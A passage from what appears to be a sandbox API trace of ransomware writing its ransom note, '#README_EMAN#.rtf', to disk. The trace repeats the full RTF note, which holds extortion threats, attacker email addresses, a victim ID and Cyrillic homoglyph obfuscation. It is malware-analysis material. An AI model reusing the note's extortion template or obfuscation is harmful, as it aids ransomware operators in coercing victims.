BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nð¦1\x97ÇrÛQ\x82\x18^\x82ÏÇ\x11\nÓ­Ã-\x99\x9bè\x13W\x03", lpUsedDefaultChar=0x0) returned 8717 [0220.530] WriteFile (in: hFile=0x2d0, lpBuffer=0x72efb8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x72efb8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.531] CloseHandle (hObject=0x2d0) returned 1 [0220.531] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\#readme_eman#.rtf")) returned 0xffffffff [0220.531] GetLastError () returned 0x2 [0220.531] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0220.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 